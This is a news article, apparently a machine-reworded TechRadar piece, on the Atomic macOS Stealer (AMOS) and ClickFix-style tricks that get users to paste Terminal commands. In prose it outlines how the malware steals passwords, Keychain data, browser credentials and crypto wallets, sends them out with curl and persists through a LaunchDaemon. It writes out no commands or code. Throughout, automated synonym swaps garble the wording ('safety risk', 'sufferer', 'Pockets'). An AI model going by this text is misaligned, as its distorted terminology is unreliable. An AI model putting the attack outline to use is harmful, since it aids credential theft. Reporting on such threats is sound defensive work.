- AMOS depends on customers executing malicious terminal instructions themselves
- Sophos MDR recognized ClickFix-style social engineering in macOS assaults
- Half of macOS stealer studies concerned AMOS, however Apple is preventing again
Atomic macOS Stealer, also called AMOS, is a persistent macOS safety risk as a result of it doesn’t want subtle zero-day vulnerabilities to compromise Apple gadgets.
As a substitute, this malware household repeatedly exploits peculiar person behaviour by tricking customers into typing a single command into their very own Terminal software.
A current incident investigated by Sophos MDR teams revealed precisely this sample: a ClickFix-style ruse persuaded a sufferer to execute a malicious line of code manually.
AMOS makes use of psychological manipulation over technical exploits
This method has develop into more and more distinguished, with researchers noting comparable social engineering ways in a number of macOS infostealer campaigns all through 2025 and early 2026.
AMOS accounted for almost 40% of all macOS safety updates deployed by Sophos in 2025, greater than doubling the detection charge of every other macOS malware household throughout the identical interval.
Moreover, nearly half of all macOS stealer buyer studies within the final three months concerned AMOS or its shut variants.
Safety corporations have tracked this malware-as-a-service operation since at the least April 2023, with notable campaigns together with a variant dubbed SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading via poisoned search outcomes associated to ChatGPT and Grok conversations.
How the malware harvests passwords and knowledge
After the preliminary Terminal command executes a bootstrapping script, the malware instantly prompts the person for his or her macOS system password.
The malicious code then validates this credential domestically utilizing a easy listing providers command earlier than storing it in a hidden file named .move throughout the person’s residence listing.
As soon as the password is secured, AMOS downloads a secondary payload that removes prolonged attributes to bypass macOS safety warnings.
The stealer additionally checks whether or not it’s working inside a digital machine or sandbox atmosphere by querying system_profiler knowledge for indicators similar to QEMU, VMware, or KVM.
The malware then proceeds to reap an intensive vary of delicate data, together with the macOS Keychain database, browser credentials from Firefox and Chrome, extension storage recordsdata, and native session tokens.
Some variants additionally deploy pretend Ledger Pockets and Trezor Suite functions designed to steal cryptocurrency pockets seeds and credentials.
All collected recordsdata are compressed right into a single archive utilizing the ditto utility earlier than being transmitted to attacker-controlled servers by way of curl POST requests.
To take care of long-term entry, the malware installs a LaunchDaemon that ensures computerized execution after each system reboot.
Regardless of the severity of AMOS, it’s price questioning whether or not safety distributors are overstating its novelty, on condition that infostealers have been focusing on Home windows programs for almost twenty years.
The malware’s heavy reliance on person consent — somebody should willingly paste and run a Terminal command — creates a major barrier that technically literate customers may simply keep away from.
Furthermore, Apple’s ongoing enhancements to Gatekeeper, XProtect, and notarization necessities might render AMOS largely ineffective inside a number of operating system updates.
The true hazard could lie much less in AMOS itself and extra within the uncomfortable fact that no platform is resistant to customers who ignore primary safety warnings.
Follow TechRadar on Google News and add us as a preferred source to get our knowledgeable information, critiques, and opinion in your feeds.
Source link
